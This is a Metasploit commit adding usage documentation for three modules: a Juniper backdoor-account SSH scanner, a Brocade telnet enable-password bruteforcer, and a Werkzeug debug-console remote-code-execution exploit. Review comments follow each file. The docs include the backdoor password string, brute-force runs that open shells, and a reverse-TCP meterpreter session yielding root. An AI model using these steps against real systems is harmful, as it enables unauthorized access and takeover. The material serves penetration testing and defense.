Commit a484875

Land rapid7#7165, Add documentation for juniper_backdoor, brocade_enable_login, and werkzeug_debug_rce
2 parents 4c15e5e + 38138e6 commit a484875

3 files changed, +347 -0 lines changed
Lines changed: 33 additions & 0 deletions
@@ -0,0 +1,33 @@
1+
## Vulnerable Application
2+
3+
Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
4+
5+
A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
6+
7+
For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
8+
9+
## Verification Steps
10+
11+
1. Install the application
12+
2. Start msfconsole
13+
3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
14+
4. Do: `set rhosts`
15+
5. Do: `run`
16+
6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
17+
18+
## Scenarios
19+
20+
Example run against a Juniper SSG5 with vuln firmware from above link.
21+
22+
```
23+
msf > use auxiliary/scanner/ssh/juniper_backdoor
24+
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
25+
rhosts => 192.168.1.1
26+
msf auxiliary(juniper_backdoor) > set verbose true
27+
verbose => true
28+
msf auxiliary(juniper_backdoor) > run
29+
30+
[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
31+
[*] Scanned 1 of 1 hosts (100% complete)
32+
[*] Auxiliary module execution completed
33+
```
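Review bot: the product named on the `## Vulnerable Application` line is wrong. The release ranges 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20, and the SSG5/SSG20 v6.3.0r19.0 firmware linked under it, are ScreenOS releases, not JunOS; the line should read `Juniper ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20 are vulnerable.` Also fix the typos `Juiper` and `puposes`, and give verification step 4 a value placeholder (`set rhosts <ip>`) as the other two docs in this commit do, since `set rhosts` on its own is not a complete command.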
Lines changed: 242 additions & 0 deletions
@@ -0,0 +1,242 @@
1+
## Vulnerable Application
2+
3+
This module is a login bruteforcer against Brocade network device's `enable` feature.
4+
5+
To configure the device in a vulnerable fashion, follow these steps:
6+
1. Set authentication mode via: `aaa authentication enable default local`
7+
8+
This module works against `enable` so we want to ensure telnet itself has no auth
9+
**The following should not be set**: `enable telnet authentication`
10+
11+
This module has been verified against:
12+
1. ICX6450-24 SWver 07.4.00bT311
13+
2. FastIron WS 624 SWver 07.2.02fT7e1
14+
15+
An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
16+
17+
## Verification Steps
18+
19+
1. Install the emulator or device
20+
2. Start msfconsole
21+
3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
22+
4. Create/set a password file: `set pass_file /<passwords.lst>`
23+
5. If desired: `set user_as_pass true`
24+
6. Do: `set rhosts <ip>`
25+
7. Do: `run`
26+
8. You should get a shell.
27+
28+
## Scenarios
29+
30+
Example run against ICX6450-24 SWver 07.4.00bT311
31+
32+
```
33+
msf > use auxiliary/scanner/telnet/brocade_enable_login
34+
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
35+
pass_file => /passwords.lst
36+
msf auxiliary(brocade_enable_login) > set user_as_pass true
37+
user_as_pass => true
38+
msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
39+
rhosts => 192.168.50.1
40+
msf auxiliary(brocade_enable_login) > run
41+
42+
[*] Attempting username gathering from config on 192.168.50.1
43+
44+
45+
46+
[*] Attempting username gathering from running-config on 192.168.50.1
47+
48+
49+
50+
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
51+
[*] Attempting to start session 192.168.50.1:23 with admin:admin
52+
[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
53+
[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
54+
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
55+
[*] Attempting to start session 192.168.50.1:23 with read:read
56+
[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
57+
[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
58+
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
59+
[*] Attempting to start session 192.168.50.1:23 with port:port
60+
[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
61+
[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
62+
[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
63+
[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
64+
[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
65+
[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
66+
[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
67+
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
68+
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
69+
[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
70+
[*] Scanned 1 of 1 hosts (100% complete)
71+
[*] Auxiliary module execution completed
72+
msf auxiliary(brocade_enable_login) > sessions -l
73+
74+
Active sessions
75+
===============
76+
77+
Id Type Information Connection
78+
-- ---- ----------- ----------
79+
1 shell TELNET admin:admin (192.168.50.1:23) 192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
80+
2 shell TELNET read:read (192.168.50.1:23) 192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
81+
3 shell TELNET port:port (192.168.50.1:23) 192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
82+
83+
msf auxiliary(brocade_enable_login) > session -i 1
84+
[-] Unknown command: session.
85+
msf auxiliary(brocade_enable_login) > sessions -i 1
86+
[*] Starting interaction with 1...
87+
88+
show sessions ?
89+
Unrecognized command
90+
BR-telnet@FWS624 Router#show ?
91+
802-1w Rapid Spanning tree IEEE 802.1w D10 status
92+
aaa Show TACACS+ and RADIUS server statistics
93+
access-list show IPv4 access-list information
94+
acl-on-arp Show ARP ACL filtering
95+
arp Arp table
96+
auth-mac-addresses MAC Authentication status
97+
batch Batch commands
98+
boot-preference System boot preference
99+
buffer-profile Displays active profile
100+
cable-diagnostics Show Cable Diagnostics
101+
chassis Power supply/fan/temperature
102+
clock System time and date
103+
configuration Configuration data in startup config file
104+
cpu-utilization CPU utilization rate
105+
debug Debug information
106+
default System default settings
107+
dot1x Dot1x information
108+
errdisable Errdisable status
109+
fdp CDP/FDP information
110+
flash Flash memory contents
111+
gvrp GVRP information
112+
inline inline power information
113+
interfaces Port status
114+
--More--, next page: Space, next line: Return key, quit: Control-c
115+
ip IP address setting
116+
ipv6 IP setting
117+
license Show license information
118+
link-aggregate 802.3ad Link Aggregation Information
119+
link-error-disable Link Debouncing Control
120+
link-keepalive Link Layer Keepalive
121+
lldp Link-Layer Discovery Protocol information
122+
local-userdb Local User Database information
123+
logging System log
124+
loop-detection loop detection status & disabled ports
125+
mac-address MAC address table
126+
media 1Gig/10G port media type
127+
memory System memory usage
128+
metro-ring Metro ring protocol information
129+
mirror Mirror ports
130+
module Module type and status
131+
monitor Monitor ports
132+
mstp show MSTP (IEEE 802.1s) information
133+
optic Optic Temperature and Power
134+
port Show port security
135+
priority-mapping 802.1Q tagged priority setting
136+
processes Active process statistics
137+
protected-link-group Show Protected Link Group Details
138+
--More--, next page: Space, next line: Return key, quit: Control-c
139+
ptrace Global ptrace information
140+
qd-buffer-profile User configured buffer/descriptor profiles
141+
qos-profiles QOS configuration
142+
qos-tos IPv4 ToS based QoS
143+
radius show radius server debug info
144+
rate-limit Rate-limiting table and actions
145+
redundancy Display management redundancy details
146+
relative-utilization Relative utilization list
147+
reload Scheduled system reset
148+
reserved-vlan-map Reserved VLAN map status
149+
rmon Rmon status
150+
running-config Current running-config
151+
scheduler-profile User configured scheduling profiles
152+
sflow sFlow information
153+
snmp SNMP statistics
154+
sntp Show SNTP
155+
span Spanning tree status
156+
statistics Packet statistics
157+
stp-bpdu-guard BPDU Guard status
158+
stp-group Spanning Tree Group Membership
159+
stp-protect-ports Show stp-protect enabled ports and their BPDU drop
160+
counters
161+
table-mac-vlan MAC Based VLAN status
162+
--More--, next page: Space, next line: Return key, quit: Control-c
163+
tech-support System snap shot for tech support
164+
telnet Telnet connection
165+
topology-group Topology Group Membership
166+
traffic-policy Show traffic policy definition
167+
trunk Show trunk status
168+
users User accounts
169+
v6-l4-acl-sessions Show IPv6 software sessions
170+
version System status
171+
vlan VLAN status
172+
vlan-group VLAN Group Membership
173+
voice-vlan Show voice vlan
174+
vsrp Show VSRP commands
175+
web-connection Current web connections
176+
webauth web authentication information
177+
who User login
178+
| Output modifiers
179+
<cr>
180+
BR-telnet@FWS624 Router#
181+
```
182+
183+
Example run against emulator mentioned above:
184+
185+
```
186+
msf > use auxiliary/scanner/telnet/brocade_enable_login
187+
msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
188+
rhosts => 127.0.0.1
189+
msf auxiliary(brocade_enable_login) > set user_as_pass true
190+
user_as_pass => true
191+
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
192+
pass_file => /passwords.lst
193+
msf auxiliary(brocade_enable_login) > run
194+
195+
[*] Attempting username gathering from config on 127.0.0.1
196+
197+
198+
199+
[*] Attempting username gathering from running-config on 127.0.0.1
200+
201+
[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
202+
[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
203+
[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
204+
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
205+
[*] Attempting to start session 127.0.0.1:23 with username:password
206+
[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
207+
[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
208+
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
209+
[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
210+
[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
211+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
212+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
213+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
214+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
215+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
216+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
217+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
218+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
219+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
220+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
221+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
222+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
223+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
224+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
225+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
226+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
227+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
228+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
229+
[*] Scanned 1 of 1 hosts (100% complete)
230+
[*] Auxiliary module execution completed
231+
msf auxiliary(brocade_enable_login) > sessions -l
232+
233+
Active sessions
234+
===============
235+
236+
Id Type Information Connection
237+
-- ---- ----------- ----------
238+
1 shell TELNET username:password (127.0.0.1:23) 127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
239+
2 shell TELNET ttrogdon:ttrogdon (127.0.0.1:23) 127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
240+
241+
msf auxiliary(brocade_enable_login) >
242+
```
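Review bot: the first scenario's caption and its transcript disagree: the heading says the run is against the ICX6450-24 (07.4.00bT311), but the prompt at the end is `BR-telnet@FWS624 Router#`, which is the FastIron WS 624 listed under verified devices; fix whichever one is wrong. The transcript also needs a sentence explaining its tail: after three shell sessions are opened, every remaining guess fails with `(Unable to Connect: )` rather than `(Incorrect: )`, which looks like the device refusing further telnet connections while the module's own sessions are still open, not like wrong passwords, and a reader will otherwise read those lines as module failures; state the cause and, if it is a session limit, advise lowering `THREADS` or closing sessions between runs. Consider trimming the `session -i 1` / `Unknown command: session.` pair (operator typo, not module behaviour) and the duplicated `port:port` attempt, and document `PASS_FILE`, `USER_AS_PASS` and the username gathering from `config` / `running-config` shown in the output in an `## Options` section, as the werkzeug doc in this commit does.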
Lines changed: 72 additions & 0 deletions
@@ -0,0 +1,72 @@
1+
## Vulnerable Application
2+
3+
Verified against:
4+
+ 0.9.6 on Debian
5+
+ 0.9.6 on Centos
6+
+ 0.10 on Debian
7+
8+
A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
9+
10+
## Verification Steps
11+
12+
1. Install the application
13+
2. Start msfconsole
14+
3. Do: `use exploit/multi/http/werkzeug_debug_rce`
15+
4. Do: `set rport <port>`
16+
5. Do: `set rhost <ip>`
17+
6. Do: `check`
18+
```
19+
[+] 10.108.106.201:8081 - The target is vulnerable.
20+
```
21+
7. Do: `set payload python/meterpreter/reverse_tcp`
22+
8. Do: `set lhost <ip>`
23+
9. Do: `exploit`
24+
10. You should get a shell.
25+
26+
## Options
27+
28+
**TARGETURI**
29+
30+
TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
31+
32+
## Scenarios
33+
34+
Example utilizing the previously mentioned sample app listed above.
35+
36+
```
37+
msf > use exploit/multi/http/werkzeug_debug_rce
38+
msf exploit(werkzeug_debug_rce) > set rport 8081
39+
rport => 8081
40+
msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
41+
rhost => 10.108.106.201
42+
msf exploit(werkzeug_debug_rce) > check
43+
[+] 10.108.106.201:8081 - The target is vulnerable.
44+
msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
45+
payload => python/meterpreter/reverse_tcp
46+
msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
47+
lhost => 10.108.106.121
48+
msf exploit(werkzeug_debug_rce) > exploit
49+
50+
[*] Started reverse handler on 10.108.106.121:4444
51+
[*] Sending stage (25277 bytes) to 10.108.106.201
52+
[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
53+
54+
meterpreter > getpid
55+
Current pid: 13034
56+
meterpreter > getuid
57+
Server username: root
58+
meterpreter > sysinfo
59+
Computer : werkzeug
60+
OS : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
61+
Architecture : x86_64
62+
Meterpreter : python/python
63+
meterpreter > shell
64+
Process 13037 created.
65+
Channel 0 created.
66+
/bin/sh: 0: can't access tty; job control turned off
67+
# ls
68+
app.py app.pyc werkzeug
69+
# exit
70+
meterpreter > exit
71+
[*] Shutting down Meterpreter...
72+
```
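Review bot: `## Vulnerable Application` never names the software; `Verified against: 0.9.6 on Debian ...` should say these are Werkzeug versions, and the section should state the precondition the module relies on, namely a Werkzeug debugger with the interactive console enabled and reachable (the linked `werkzeug_console.py` is described as a sample app that enables exactly that). The `TARGETURI` note `it can be changed within the python script` is ambiguous: say that the console path is chosen by the target application, so `/console` is only the Werkzeug default and should be confirmed per target. In the scenario, `getuid` returning `Server username: root` deserves a caveat that the shell has the privileges of the process serving the application, root here only because the sample app was run as root. Minor: `Meterpreter session 2 opened` on what the doc presents as the first `exploit` run suggests an earlier session was cut from the transcript; renumber or note it.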